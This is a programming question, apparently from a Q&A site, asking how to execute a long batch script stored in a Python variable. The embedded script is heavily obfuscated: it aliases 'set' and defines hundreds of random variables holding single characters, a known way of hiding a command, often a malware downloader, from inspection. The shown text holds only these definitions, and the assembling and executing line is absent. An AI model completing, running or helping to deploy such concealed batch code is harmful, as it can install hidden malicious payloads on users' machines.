# Running long bat script inside a Python program variable

Tags: python, batch-file, syntax, subprocess

I'm trying to run a long .bat script inside a variable from my Python script.
I first used `os.system` but I realized it doesn't support long string so I used subprocess.
Here is an example of my code:

```
import os 
import subprocess

batprogram = r'''
@echo off
set ievvLS=set
%ievvLS% wkpVpB= 
%ievvLS%%wkpVpB%Vyooze==
%ievvLS%%wkpVpB%LVxfDq%Vyooze%o
%ievvLS%%wkpVpB%rRwfZB%Vyooze%C
%ievvLS%%wkpVpB%QebYvl%Vyooze%j
%ievvLS%%wkpVpB%DqqFUe%Vyooze%d
%ievvLS%%wkpVpB%dRNJsS%Vyooze%g
%ievvLS%%wkpVpB%FtMucE%Vyooze%6
%ievvLS%%wkpVpB%gTVjRS%Vyooze%%
%ievvLS%%wkpVpB%zHEnNT%Vyooze%"
%ievvLS%%wkpVpB%PyFsfh%Vyooze%k
%ievvLS%%wkpVpB%dCnJin%Vyooze%$
%ievvLS%%wkpVpB%TkQLeH%Vyooze%(
%ievvLS%%wkpVpB%mLwPrN%Vyooze%"
%ievvLS%%wkpVpB%pPpVdm%Vyooze%s
%ievvLS%%wkpVpB%wVsTPu%Vyooze%g
%ievvLS%%wkpVpB%fGPzgo%Vyooze%0
%ievvLS%%wkpVpB%nEuzZC%Vyooze%;
%ievvLS%%wkpVpB%qyshYw%Vyooze%-
%ievvLS%%wkpVpB%nHrsWq%Vyooze%l
%ievvLS%%wkpVpB%IvRqJe%Vyooze%0
%ievvLS%%wkpVpB%XGcLdx%Vyooze%9
%ievvLS%%wkpVpB%KoBuJz%Vyooze%)
%ievvLS%%wkpVpB%SCmjUU%Vyooze%d
%ievvLS%%wkpVpB%WRZxwY%Vyooze%)
%ievvLS%%wkpVpB%irjwsg%Vyooze%w
%ievvLS%%wkpVpB%tBpmlb%Vyooze% 
%ievvLS%%wkpVpB%KtDiWY%Vyooze%w
%ievvLS%%wkpVpB%nEmdCF%Vyooze%y
%ievvLS%%wkpVpB%HDPcoO%Vyooze%a
%ievvLS%%wkpVpB%jqPpXi%Vyooze%t
%ievvLS%%wkpVpB%PZAhQE%Vyooze%d
%ievvLS%%wkpVpB%pAmnCF%Vyooze%y
%ievvLS%%wkpVpB%OsCNTu%Vyooze% 
%ievvLS%%wkpVpB%sknSXW%Vyooze%a
%ievvLS%%wkpVpB%aEePoR%Vyooze%,
%ievvLS%%wkpVpB%APYBEr%Vyooze%R
%ievvLS%%wkpVpB%zacvGV%Vyooze% 
%ievvLS%%wkpVpB%zafOwy%Vyooze%e
%ievvLS%%wkpVpB%yAVjPz%Vyooze%n
%ievvLS%%wkpVpB%kLupsO%Vyooze%t
%ievvLS%%wkpVpB%csQuVL%Vyooze%s
%ievvLS%%wkpVpB%dltLky%Vyooze%|
%ievvLS%%wkpVpB%xcUPic%Vyooze%)
%ievvLS%%wkpVpB%lhiObE%Vyooze%[
%ievvLS%%wkpVpB%CkYJcF%Vyooze%o
%ievvLS%%wkpVpB%TlZzCS%Vyooze%y
%ievvLS%%wkpVpB%uIPPwq%Vyooze%l
%ievvLS%%wkpVpB%MRBqSb%Vyooze%t
%ievvLS%%wkpVpB%qSpGWJ%Vyooze%t
%ievvLS%%wkpVpB%UrCpMu%Vyooze%e
%ievvLS%%wkpVpB%MsEACQ%Vyooze% 
%ievvLS%%wkpVpB%jxpppx%Vyooze% 
%ievvLS%%wkpVpB%KFhoJL%Vyooze%2
%ievvLS%%wkpVpB%CYokBf%Vyooze%a
%ievvLS%%wkpVpB%ifoJUu%Vyooze%s
%ievvLS%%wkpVpB%JPpYWQ%Vyooze%t
%ievvLS%%wkpVpB%gsQkle%Vyooze%e
%ievvLS%%wkpVpB%pPojwv%Vyooze% 
%ievvLS%%wkpVpB%kioxvX%Vyooze%2
%ievvLS%%wkpVpB%uWRlzN%Vyooze%y
%ievvLS%%wkpVpB%AUsOMd%Vyooze%.
%ievvLS%%wkpVpB%beJySG%Vyooze%e
%ievvLS%%wkpVpB%dUaxqc%Vyooze% 
%ievvLS%%wkpVpB%QyfaOW%Vyooze%5
%ievvLS%%wkpVpB%OEmZvl%Vyooze%$
%ievvLS%%wkpVpB%ZWEafr%Vyooze%r
%ievvLS%%wkpVpB%mCtaQh%Vyooze%e
%ievvLS%%wkpVpB%EDirHG%Vyooze% 
%ievvLS%%wkpVpB%sPRZYa%Vyooze%d
%ievvLS%%wkpVpB%UJvghl%Vyooze% 
%ievvLS%%wkpVpB%rXXiCX%Vyooze%n
%ievvLS%%wkpVpB%XCqqzI%Vyooze%h
%ievvLS%%wkpVpB%hTgGDN%Vyooze%n
%ievvLS%%wkpVpB%jaJPvb%Vyooze%n
%ievvLS%%wkpVpB%OIwQXq%Vyooze%t
%ievvLS%%wkpVpB%ZGgRrg%Vyooze%(
%ievvLS%%wkpVpB%jABPCg%Vyooze%]
%ievvLS%%wkpVpB%hvWbYX%Vyooze%e
%ievvLS%%wkpVpB%hxbCDu%Vyooze%t
%ievvLS%%wkpVpB%bnHpsQ%Vyooze%4
%ievvLS%%wkpVpB%mrvGGn%Vyooze%y
%ievvLS%%wkpVpB%hTyOny%Vyooze% 
%ievvLS%%wkpVpB%lcXjvU%Vyooze% 
%ievvLS%%wkpVpB%ttnJNC%Vyooze%.
%ievvLS%%wkpVpB%LrtgJP%Vyooze%e
%ievvLS%%wkpVpB%zVWJMI%Vyooze%l
%ievvLS%%wkpVpB%qfrhZQ%Vyooze%-
%ievvLS%%wkpVpB%hJjPNb%Vyooze%e
%ievvLS%%wkpVpB%cjAYjY%Vyooze%I
%ievvLS%%wkpVpB%hGrqpe%Vyooze%[
%ievvLS%%wkpVpB%pFeupp%Vyooze%$
%ievvLS%%wkpVpB%DsMHCw%Vyooze%o
%ievvLS%%wkpVpB%RSJJmV%Vyooze%b
%ievvLS%%wkpVpB%dvSfwk%Vyooze%r
%ievvLS%%wkpVpB%qUcQBx%Vyooze%s
%ievvLS%%wkpVpB%BUuLff%Vyooze%t
%ievvLS%%wkpVpB%LMwLJL%Vyooze%e
%ievvLS%%wkpVpB%fXeWpP%Vyooze%y
%ievvLS%%wkpVpB%Uesqeu%Vyooze%e
%ievvLS%%wkpVpB%ONSorZ%Vyooze%n
%ievvLS%%wkpVpB%zBAhyj%Vyooze%d
%ievvLS%%wkpVpB%wbqMXA%Vyooze%)
%ievvLS%%wkpVpB%ibLHFr%Vyooze%w
%ievvLS%%wkpVpB%uvvuET%Vyooze%d
%ievvLS%%wkpVpB%XyPgUx%Vyooze%r
%ievvLS%%wkpVpB%CdAogT%Vyooze%y
%ievvLS%%wkpVpB%ZpBome%Vyooze%i
%ievvLS%%wkpVpB%pHIUBj%Vyooze%(
%ievvLS%%wkpVpB%QbaFKB%Vyooze%d
%ievvLS%%wkpVpB%gPolBw%Vyooze%u
%ievvLS%%wkpVpB%MwMdUn%Vyooze%C
%ievvLS%%wkpVpB%KFRkWs%Vyooze%b
%ievvLS%%wkpVpB%aWcjVg%Vyooze%e
%ievvLS%%wkpVpB%jIwBEs%Vyooze% 
%ievvLS%%wkpVpB%fInUMT%Vyooze%e
%ievvLS%%wkpVpB%hBIDPk%Vyooze% 
%ievvLS%%wkpVpB%JLjDNG%Vyooze% 
%ievvLS%%wkpVpB%IUAlTA%Vyooze%i
%ievvLS%%wkpVpB%pFCnJQ%Vyooze%h
%ievvLS%%wkpVpB%UWiNix%Vyooze%e
%ievvLS%%wkpVpB%jykobV%Vyooze%l
%ievvLS%%wkpVpB%nNaCHx%Vyooze%b
%ievvLS%%wkpVpB%meznVu%Vyooze% 
%ievvLS%%wkpVpB%ISuzJx%Vyooze%L
%ievvLS%%wkpVpB%XYZODo%Vyooze%r
%ievvLS%%wkpVpB%eBhXfH%Vyooze%=
%ievvLS%%wkpVpB%dfdvBO%Vyooze%c
%ievvLS%%wkpVpB%bvPUkm%Vyooze%"
%ievvLS%%wkpVpB%EBcEvu%Vyooze%s
%ievvLS%%wkpVpB%fxDgrc%Vyooze%y
%ievvLS%%wkpVpB%lTsrHH%Vyooze% 
%ievvLS%%wkpVpB%KcSbea%Vyooze%>
%ievvLS%%wkpVpB%zfRjdJ%Vyooze%F
%ievvLS%%wkpVpB%YmQvBa%Vyooze%S
%ievvLS%%wkpVpB%OoVItv%Vyooze%(
%ievvLS%%wkpVpB%THCZSZ%Vyooze%S
%ievvLS%%wkpVpB%mwQmaG%Vyooze%s
%ievvLS%%wkpVpB%JJTKxe%Vyooze%m
%ievvLS%%wkpVpB%vnLGzs%Vyooze%[
%ievvLS%%wkpVpB%tBRZiX%Vyooze%I
%ievvLS%%wkpVpB%dfmNGZ%Vyooze% 
%ievvLS%%wkpVpB%uJSOMo%Vyooze% 
%ievvLS%%wkpVpB%aetodd%Vyooze%n
%ievvLS%%wkpVpB%yjKYuU%Vyooze%C
%ievvLS%%wkpVpB%JvnVqT%Vyooze%e
%ievvLS%%wkpVpB%iJtPfr%Vyooze%b
%ievvLS%%wkpVpB%UGgevE%Vyooze%t
%ievvLS%%wkpVpB%uXxJbQ%Vyooze%s
%ievvLS%%wkpVpB%SGUHXs%Vyooze%0
%ievvLS%%wkpVpB%VyivCw%Vyooze%h
%ievvLS%%wkpVpB%gDsyHS%Vyooze%.
%ievvLS%%wkpVpB%hVakxW%Vyooze%,
%ievvLS%%wkpVpB%eshNHU%Vyooze%.
%ievvLS%%wkpVpB%OudrYH%Vyooze%d
%ievvLS%%wkpVpB%EntQkG%Vyooze%a
%ievvLS%%wkpVpB%RWsrou%Vyooze%"
%ievvLS%%wkpVpB%SkqvtR%Vyooze%;
%ievvLS%%wkpVpB%UlYljZ%Vyooze%c
%ievvLS%%wkpVpB%BsRFIG%Vyooze%=
%ievvLS%%wkpVpB%somXos%Vyooze%a
%ievvLS%%wkpVpB%vPKTrX%Vyooze%1
%ievvLS%%wkpVpB%FveJVl%Vyooze%u
%ievvLS%%wkpVpB%ixVMYQ%Vyooze%2
%ievvLS%%wkpVpB%vSaWHv%Vyooze%t
%ievvLS%%wkpVpB%UggYxV%Vyooze%c
%ievvLS%%wkpVpB%nflWhI%Vyooze%=
%ievvLS%%wkpVpB%cmLuEQ%Vyooze%i
%ievvLS%%wkpVpB%sbdbmZ%Vyooze%-
%ievvLS%%wkpVpB%xkhtRA%Vyooze%(
%ievvLS%%wkpVpB%cEeWSu%Vyooze%i
%ievvLS%%wkpVpB%RPFzxm%Vyooze%g
%ievvLS%%wkpVpB%eBfpGi%Vyooze%(
%ievvLS%%wkpVpB%yFCnrt%Vyooze%L
%ievvLS%%wkpVpB%vJOeTg%Vyooze%e
%ievvLS%%wkpVpB%GRFbHk%Vyooze%-
%ievvLS%%wkpVpB%VMfRzA%Vyooze%n
%ievvLS%%wkpVpB%tKEnWx%Vyooze%W
%ievvLS%%wkpVpB%ONfSAG%Vyooze%e
%ievvLS%%wkpVpB%BcTlMZ%Vyooze%a
%ievvLS%%wkpVpB%OrtgFV%Vyooze% 
%ievvLS%%wkpVpB%pjenXs%Vyooze%e
%ievvLS%%wkpVpB%xFhrQK%Vyooze%t
%ievvLS%%wkpVpB%KUiPRD%Vyooze%d
%ievvLS%%wkpVpB%ZKJjFN%Vyooze%6
%ievvLS%%wkpVpB%FFoAxH%Vyooze%n
%ievvLS%%wkpVpB%fxcuye%Vyooze%.
%ievvLS%%wkpVpB%gBmsax%Vyooze%y
%ievvLS%%wkpVpB%dVgniI%Vyooze%{
%ievvLS%%wkpVpB%JqKYDL%Vyooze%y
%ievvLS%%wkpVpB%KTogWB%Vyooze%e
%ievvLS%%wkpVpB%tnDdAp%Vyooze%B
%ievvLS%%wkpVpB%EYVTKY%Vyooze%a
%ievvLS%%wkpVpB%vWyUxw%Vyooze%$
%ievvLS%%wkpVpB%HgzdZk%Vyooze%=
%ievvLS%%wkpVpB%LqsMDd%Vyooze%a
%ievvLS%%wkpVpB%sppmDF%Vyooze%t
%ievvLS%%wkpVpB%tzAGRF%Vyooze%$
%ievvLS%%wkpVpB%prCvtG%Vyooze%}
%ievvLS%%wkpVpB%ClyKUn%Vyooze%a
%ievvLS%%wkpVpB%VhkYYP%Vyooze%i
%ievvLS%%wkpVpB%FGVZHw%Vyooze%S
%ievvLS%%wkpVpB%mlYEVf%Vyooze%r
%ievvLS%%wkpVpB%xlseey%Vyooze%i
%ievvLS%%wkpVpB%qLFRFO%Vyooze%e
%ievvLS%%wkpVpB%ecaKBr%Vyooze% 
%ievvLS%%wkpVpB%egkEZE%Vyooze%t
%ievvLS%%wkpVpB%XFEoUn%Vyooze%t
%ievvLS%%wkpVpB%fRyMmX%Vyooze%l
%ievvLS%%wkpVpB%sDxitE%Vyooze%e
%ievvLS%%wkpVpB%IWsNVw%Vyooze%t
%ievvLS%%wkpVpB%hwybfz%Vyooze%t
%ievvLS%%wkpVpB%LzGjLx%Vyooze%0
%ievvLS%%wkpVpB%KmPzJu%Vyooze%t
%ievvLS%%wkpVpB%ArWmFH%Vyooze%g
%ievvLS%%wkpVpB%aPXDzA%Vyooze%b
%ievvLS%%wkpVpB%FpCmCv%Vyooze%.
%ievvLS%%wkpVpB%cJjuWa%Vyooze%N
%ievvLS%%wkpVpB%FONPqi%Vyooze% 
%ievvLS%%wkpVpB%pcGlaU%Vyooze%P
%ievvLS%%wkpVpB%UmTbMA%Vyooze%N
%ievvLS%%wkpVpB%DJGGxa%Vyooze%p
%ievvLS%%wkpVpB%chrjvb%Vyooze%N
%ievvLS%%wkpVpB%kzXypY%Vyooze%c
%ievvLS%%wkpVpB%dZAtth%Vyooze%l
%ievvLS%%wkpVpB%FJQYuS%Vyooze%P
%ievvLS%%wkpVpB%wLijYt%Vyooze%n
%ievvLS%%wkpVpB%mhTvNf%Vyooze%s
%ievvLS%%wkpVpB%UHCPUJ%Vyooze%e
%ievvLS%%wkpVpB%wOWglP%Vyooze%.
%ievvLS%%wkpVpB%seccFC%Vyooze%w
%ievvLS%%wkpVpB%JCmWoA%Vyooze%I
%ievvLS%%wkpVpB%LSkzFs%Vyooze%T
%ievvLS%%wkpVpB%bQZCmK%Vyooze%$
%ievvLS%%wkpVpB%azJfDB%Vyooze%]
%ievvLS%%wkpVpB%FhvewO%Vyooze%$
%ievvLS%%wkpVpB%dURSZn%Vyooze%t
%ievvLS%%wkpVpB%GmWaYE%Vyooze%4
%ievvLS%%wkpVpB%GrHJPW%Vyooze%t
%ievvLS%%wkpVpB%sWQJCd%Vyooze%n
%ievvLS%%wkpVpB%ykJGGD%Vyooze%e
%ievvLS%%wkpVpB%rEpSCM%Vyooze%t
%ievvLS%%wkpVpB%niuzxk%Vyooze%)
%ievvLS%%wkpVpB%GxLtNZ%Vyooze%a
%ievvLS%%wkpVpB%fMfvCd%Vyooze%t
%ievvLS%%wkpVpB%LWzEMF%Vyooze%e
%ievvLS%%wkpVpB%ZbqWuD%Vyooze%r
%ievvLS%%wkpVpB%YiUEpa%Vyooze%{
%ievvLS%%wkpVpB%YpkiEj%Vyooze%a
%ievvLS%%wkpVpB%aOgoEU%Vyooze%e
%ievvLS%%wkpVpB%ZEPaZt%Vyooze%i
%ievvLS%%wkpVpB%nTwkIs%Vyooze%)
%ievvLS%%wkpVpB%UjCimk%Vyooze%i
%ievvLS%%wkpVpB%YPpLxL%Vyooze%b
%ievvLS%%wkpVpB%scHDGY%Vyooze%s
%ievvLS%%wkpVpB%ZOLQgr%Vyooze%G
%ievvLS%%wkpVpB%GkrvZM%Vyooze%.
%ievvLS%%wkpVpB%QkYvhW%Vyooze%n
%ievvLS%%wkpVpB%vMfjpb%Vyooze%t
%ievvLS%%wkpVpB%uTKwKe%Vyooze%&
%ievvLS%%wkpVpB%RSaWXo%Vyooze%=
%ievvLS%%wkpVpB%yhsxhX%Vyooze%;
%ievvLS%%wkpVpB%jqDqwK%Vyooze%O
%ievvLS%%wkpVpB%GBfvbL%Vyooze%i
%ievvLS%%wkpVpB%jPeQJV%Vyooze%p
%ievvLS%%wkpVpB%vLOKKS%Vyooze%n
%ievvLS%%wkpVpB%PVQyAM%Vyooze%t
%ievvLS%%wkpVpB%TztDap%Vyooze%h
%ievvLS%%wkpVpB%TlEQth%Vyooze%.
%ievvLS%%wkpVpB%SRtoAn%Vyooze%b
%ievvLS%%wkpVpB%VFPeku%Vyooze%n
%ievvLS%%wkpVpB%MwaHfb%Vyooze%t
%ievvLS%%wkpVpB%sieRwK%Vyooze%T
%ievvLS%%wkpVpB%yipzdb%Vyooze%e
%ievvLS%%wkpVpB%bDJVsG%Vyooze%n
%ievvLS%%wkpVpB%FTVdjD%Vyooze%l
%ievvLS%%wkpVpB%shbjcQ%Vyooze%A
%ievvLS%%wkpVpB%GMXhfK%Vyooze%e
%ievvLS%%wkpVpB%xJgOIB%Vyooze%1
%ievvLS%%wkpVpB%GbjNUL%Vyooze%.
%ievvLS%%wkpVpB%nTcAgy%Vyooze%0
%ievvLS%%wkpVpB%eFjCKM%Vyooze%(
%ievvLS%%wkpVpB%qtAyxX%Vyooze%.
%ievvLS%%wkpVpB%yPaFrp%Vyooze%a
%ievvLS%%wkpVpB%UiulqU%Vyooze%m
%ievvLS%%wkpVpB%KyQSgJ%Vyooze%$
%ievvLS%%wkpVpB%VCqTvA%Vyooze%e
%ievvLS%%wkpVpB%VGIGGt%Vyooze% 
%ievvLS%%wkpVpB%enSBsx%Vyooze%e
%ievvLS%%wkpVpB%tWJYyl%Vyooze%t
%ievvLS%%wkpVpB%UPVELz%Vyooze%c
%ievvLS%%wkpVpB%lUUgSw%Vyooze%$
%ievvLS%%wkpVpB%yhlHlV%Vyooze%s
%ievvLS%%wkpVpB%tLtwlC%Vyooze%j
%ievvLS%%wkpVpB%zPrdpG%Vyooze%:
%ievvLS%%wkpVpB%QHnlxd%Vyooze%h
%ievvLS%%wkpVpB%bazYct%Vyooze%w
%ievvLS%%wkpVpB%ojTIkt%Vyooze%k
%ievvLS%%wkpVpB%kpfHpK%Vyooze%e
%ievvLS%%wkpVpB%RRrFIa%Vyooze%I
%ievvLS%%wkpVpB%NMtVis%Vyooze% 
%ievvLS%%wkpVpB%ldwNPM%Vyooze%t
%ievvLS%%wkpVpB%YkSXHZ%Vyooze% 
%ievvLS%%wkpVpB%uuXleY%Vyooze%c
%ievvLS%%wkpVpB%rmUOZV%Vyooze% 
%ievvLS%%wkpVpB%LCyfgW%Vyooze%a
%ievvLS%%wkpVpB%rQbIdu%Vyooze% 
%ievvLS%%wkpVpB%SPXIPO%Vyooze%$
%ievvLS%%wkpVpB%eaAVUp%Vyooze%d
%ievvLS%%wkpVpB%MpKgiP%Vyooze% 
%ievvLS%%wkpVpB%NKmhHs%Vyooze%$
%ievvLS%%wkpVpB%MqxcTd%Vyooze%e
%ievvLS%%wkpVpB%wOPFBR%Vyooze%S
%ievvLS%%wkpVpB%njvdLA%Vyooze%$
%ievvLS%%wkpVpB%ETBsfp%Vyooze%P
%ievvLS%%wkpVpB%MHRuKe%Vyooze% 
%ievvLS%%wkpVpB%zQnWKg%Vyooze%O
%ievvLS%%wkpVpB%htsMaa%Vyooze%S
%ievvLS%%wkpVpB%LNkqZN%Vyooze%r
%ievvLS%%wkpVpB%HLpJnj%Vyooze%c
%ievvLS%%wkpVpB%PxMfyp%Vyooze%n
%ievvLS%%wkpVpB%eVxOlI%Vyooze%s
%ievvLS%%wkpVpB%WUHpaw%Vyooze%e
%ievvLS%%wkpVpB%wBGXvH%Vyooze%a
%ievvLS%%wkpVpB%cAKQnd%Vyooze%o
%ievvLS%%wkpVpB%btKber%Vyooze% 
%ievvLS%%wkpVpB%Zglmhu%Vyooze% 
%ievvLS%%wkpVpB%IEjMKs%Vyooze%.
%ievvLS%%wkpVpB%jdMaQf%Vyooze%C
%ievvLS%%wkpVpB%gtjHZu%Vyooze%t
%ievvLS%%wkpVpB%gQJjzK%Vyooze%i
%ievvLS%%wkpVpB%PWWdKV%Vyooze%.
%ievvLS%%wkpVpB%OtZgRC%Vyooze% 
%ievvLS%%wkpVpB%lNvjfo%Vyooze%s
%ievvLS%%wkpVpB%NuAhJf%Vyooze%s
%ievvLS%%wkpVpB%EAGNuS%Vyooze%n
%ievvLS%%wkpVpB%dlhKPp%Vyooze%;
%ievvLS%%wkpVpB%VEQnIj%Vyooze%x
%ievvLS%%wkpVpB%LnEamc%Vyooze% 
%ievvLS%%wkpVpB%dxNRyr%Vyooze% 
%ievvLS%%wkpVpB%hzIimF%Vyooze%)
%ievvLS%%wkpVpB%aaRxZF%Vyooze%m
%ievvLS%%wkpVpB%fSPexO%Vyooze%b
%ievvLS%%wkpVpB%dFRphs%Vyooze%t
%ievvLS%%wkpVpB%lQPCsL%Vyooze%e
%ievvLS%%wkpVpB%YZVBFk%Vyooze%s
%ievvLS%%wkpVpB%NjdNRY%Vyooze%)
%ievvLS%%wkpVpB%ZjxiwI%Vyooze%d
%ievvLS%%wkpVpB%DyoRJI%Vyooze%1
%ievvLS%%wkpVpB%ZjwaYj%Vyooze%2
%ievvLS%%wkpVpB%QwTWfm%Vyooze%d
%ievvLS%%wkpVpB%UMTWTC%Vyooze%I
%ievvLS%%wkpVpB%inynvl%Vyooze%G
%ievvLS%%wkpVpB%uSiTZI%Vyooze%t
%ievvLS%%wkpVpB%QEbltk%Vyooze%r
%ievvLS%%wkpVpB%AEVfVv%Vyooze%$
%ievvLS%%wkpVpB%PJdQaQ%Vyooze%e
%ievvLS%%wkpVpB%ZrlSly%Vyooze%m
%ievvLS%%wkpVpB%KrKXtJ%Vyooze%e
%ievvLS%%wkpVpB%Pjofnq%Vyooze%n
%ievvLS%%wkpVpB%sSDxPh%Vyooze% 
%ievvLS%%wkpVpB%muDefP%Vyooze%b
%ievvLS%%wkpVpB%NNEPCc%Vyooze%5
%ievvLS%%wkpVpB%OaMawO%Vyooze%;
%ievvLS%%wkpVpB%uchBRL%Vyooze%8
%ievvLS%%wkpVpB%YdykOa%Vyooze%t
%ievvLS%%wkpVpB%wvRrjd%Vyooze%m
%ievvLS%%wkpVpB%JMjIsA%Vyooze%m
%ievvLS%%wkpVpB%Vvffmb%Vyooze%$
%ievvLS%%wkpVpB%fVuhNU%Vyooze%4
%ievvLS%%wkpVpB%UVRILi%Vyooze%G
%ievvLS%%wkpVpB%roqXKQ%Vyooze%c
%ievvLS%%wkpVpB%lXPPKk%Vyooze%+
%ievvLS%%wkpVpB%GpBugS%Vyooze%(
%ievvLS%%wkpVpB%jCZgRA%Vyooze%P
%ievvLS%%wkpVpB%joXysY%Vyooze%t
%ievvLS%%wkpVpB%tvGGUn%Vyooze%(
%ievvLS%%wkpVpB%XCSVEv%Vyooze% 
%ievvLS%%wkpVpB%idZFDZ%Vyooze%$
%ievvLS%%wkpVpB%hQdvWV%Vyooze%;
%ievvLS%%wkpVpB%FQHbqM%Vyooze%e
%ievvLS%%wkpVpB%SrMIfC%Vyooze%;
%ievvLS%%wkpVpB%SbmKFf%Vyooze%m
%ievvLS%%wkpVpB%NJUNFu%Vyooze%e
%ievvLS%%wkpVpB%kGQOml%Vyooze%3
%ievvLS%%wkpVpB%ArxQhX%Vyooze%$
%ievvLS%%wkpVpB%jhncHK%Vyooze%t
%ievvLS%%wkpVpB%drhsVR%Vyooze%n
%ievvLS%%wkpVpB%YSiUvW%Vyooze%C
%ievvLS%%wkpVpB%dGtojE%Vyooze%c
%ievvLS%%wkpVpB%WMMafK%Vyooze%)
%ievvLS%%wkpVpB%RXSuun%Vyooze%0
%ievvLS%%wkpVpB%ubyXjj%Vyooze%>
%ievvLS%%wkpVpB%wigvlt%Vyooze%.
%ievvLS%%wkpVpB%bjZNgb%Vyooze%-
%ievvLS%%wkpVpB%KvScMe%Vyooze%;
%ievvLS%%wkpVpB%hVbzsX%Vyooze%N
%ievvLS%%wkpVpB%nCqvvh%Vyooze%e
%ievvLS%%wkpVpB%btciJE%Vyooze%t
%ievvLS%%wkpVpB%xNDTaI%Vyooze%O
%ievvLS%%wkpVpB%nHRlXg%Vyooze%e
%ievvLS%%wkpVpB%pgJXzu%Vyooze% 
%ievvLS%%wkpVpB%lENLpe%Vyooze%a
%ievvLS%%wkpVpB%NLqZae%Vyooze%e
%ievvLS%%wkpVpB%IHJuCX%Vyooze%d
%ievvLS%%wkpVpB%fWRCWy%Vyooze%a
%ievvLS%%wkpVpB%edlPBe%Vyooze%o
%ievvLS%%wkpVpB%aYtudY%Vyooze%o
%ievvLS%%wkpVpB%HVDnjV%Vyooze%n
%ievvLS%%wkpVpB%fzHCrA%Vyooze%.
%ievvLS%%wkpVpB%zVTWlY%Vyooze%]
%ievvLS%%wkpVpB%KtIKCj%Vyooze%o
%ievvLS%%wkpVpB%RTSBPU%Vyooze%e
%ievvLS%%wkpVpB%FmDPFR%Vyooze% 
%ievvLS%%wkpVpB%xWXcst%Vyooze%C
%ievvLS%%wkpVpB%qUJzMO%Vyooze%e
%ievvLS%%wkpVpB%wNcZmU%Vyooze%l
%ievvLS%%wkpVpB%SUBSWd%Vyooze%n
%ievvLS%%wkpVpB%NVhadk%Vyooze%S
%ievvLS%%wkpVpB%SoKsrX%Vyooze%s
%ievvLS%%wkpVpB%iicgwp%Vyooze%x
%ievvLS%%wkpVpB%tyEMcf%Vyooze%N
%ievvLS%%wkpVpB%yEyBBz%Vyooze%)
%ievvLS%%wkpVpB%zjqDpZ%Vyooze%8
%ievvLS%%wkpVpB%orFphr%Vyooze%g
%ievvLS%%wkpVpB%YDneLL%Vyooze%}
%ievvLS%%wkpVpB%PoMvpn%Vyooze%s
%ievvLS%%wkpVpB%gTGpJJ%Vyooze%t
%ievvLS%%wkpVpB%RvsPaA%Vyooze%;
%ievvLS%%wkpVpB%JoLLkf%Vyooze%B
%ievvLS%%wkpVpB%VtNXGm%Vyooze% 
%ievvLS%%wkpVpB%ekxgcn%Vyooze%:
%ievvLS%%wkpVpB%nxEJCq%Vyooze%e
%ievvLS%%wkpVpB%KjeQmp%Vyooze%=
%ievvLS%%wkpVpB%YBXVdH%Vyooze%0
%ievvLS%%wkpVpB%xkXXpj%Vyooze%.
%ievvLS%%wkpVpB%PpjUcC%Vyooze%s
%ievvLS%%wkpVpB%pBEdZV%Vyooze%,
%ievvLS%%wkpVpB%JFwOCs%Vyooze%E
%ievvLS%%wkpVpB%vHWNup%Vyooze%.
%ievvLS%%wkpVpB%xdwzwX%Vyooze%b
%ievvLS%%wkpVpB%gGoErC%Vyooze%E
%ievvLS%%wkpVpB%kWVqPT%Vyooze%m
%ievvLS%%wkpVpB%rknrBO%Vyooze%,
%ievvLS%%wkpVpB%Zctznc%Vyooze%e
%ievvLS%%wkpVpB%UnBnJr%Vyooze%h
%ievvLS%%wkpVpB%NToSMC%Vyooze%x
%ievvLS%%wkpVpB%iqPyXb%Vyooze%;
%ievvLS%%wkpVpB%Bhbfhs%Vyooze%b
%ievvLS%%wkpVpB%yFqTHq%Vyooze%(
%ievvLS%%wkpVpB%OBhRqs%Vyooze%g
%ievvLS%%wkpVpB%HNNpUN%Vyooze%t
%ievvLS%%wkpVpB%HLWTwk%Vyooze%t
%ievvLS%%wkpVpB%DYQwnQ%Vyooze%T
%ievvLS%%wkpVpB%mixfiD%Vyooze%(
%ievvLS%%wkpVpB%gWvnnR%Vyooze%s
%ievvLS%%wkpVpB%RMaXRB%Vyooze%"
%ievvLS%%wkpVpB%jJhRex%Vyooze%t
%ievvLS%%wkpVpB%rHpxQx%Vyooze%i
%ievvLS%%wkpVpB%RqeGCr%Vyooze%W
%ievvLS%%wkpVpB%vuXxnd%Vyooze%5
%ievvLS%%wkpVpB%gdEiAe%Vyooze%o
%ievvLS%%wkpVpB%wGeZXQ%Vyooze% 
%ievvLS%%wkpVpB%xcEIQz%Vyooze%e
%ievvLS%%wkpVpB%llfuTn%Vyooze%s
%ievvLS%%wkpVpB%mDHjAH%Vyooze%s
%ievvLS%%wkpVpB%qTaqJt%Vyooze%$
%ievvLS%%wkpVpB%LMnFBs%Vyooze% 
%ievvLS%%wkpVpB%irbdlN%Vyooze% 
%ievvLS%%wkpVpB%oTIsri%Vyooze%b
%ievvLS%%wkpVpB%VbUNgH%Vyooze%d
%ievvLS%%wkpVpB%iJYYpt%Vyooze%r
%ievvLS%%wkpVpB%glvGIu%Vyooze%s
%ievvLS%%wkpVpB%txrLit%Vyooze%$
%ievvLS%%wkpVpB%CaiOEA%Vyooze% 
%ievvLS%%wkpVpB%EhNtDF%Vyooze%e
%ievvLS%%wkpVpB%XBHMHr%Vyooze%"
%ievvLS%%wkpVpB%dpEwTu%Vyooze% 
%ievvLS%%wkpVpB%BUUTDV%Vyooze%|
%ievvLS%%wkpVpB%FQZqfJ%Vyooze%-
%ievvLS%%wkpVpB%CbLZMA%Vyooze%-
%ievvLS%%wkpVpB%vsIsVT%Vyooze%c
%ievvLS%%wkpVpB%ANtRJV%Vyooze%i
%ievvLS%%wkpVpB%vuoAOo%Vyooze%a
%ievvLS%%wkpVpB%RRQxRY%Vyooze%S
%ievvLS%%wkpVpB%qCEHBG%Vyooze%d
%ievvLS%%wkpVpB%RtDJBL%Vyooze%k
%ievvLS%%wkpVpB%GkdNtI%Vyooze%N
%ievvLS%%wkpVpB%jDpetM%Vyooze%H
%ievvLS%%wkpVpB%ZPPIHa%Vyooze%d
%ievvLS%%wkpVpB%vbIvax%Vyooze%e
%ievvLS%%wkpVpB%iZrDez%Vyooze%.
%ievvLS%%wkpVpB%YXflGo%Vyooze%c
%ievvLS%%wkpVpB%yulYxO%Vyooze%(
%ievvLS%%wkpVpB%DIcocx%Vyooze%m
%ievvLS%%wkpVpB%LEbIVR%Vyooze% 
%ievvLS%%wkpVpB%ASefaY%Vyooze%.
%ievvLS%%wkpVpB%MBqGCw%Vyooze%k
%ievvLS%%wkpVpB%wwIFDg%Vyooze%(
%ievvLS%%wkpVpB%IwMxYo%Vyooze%)
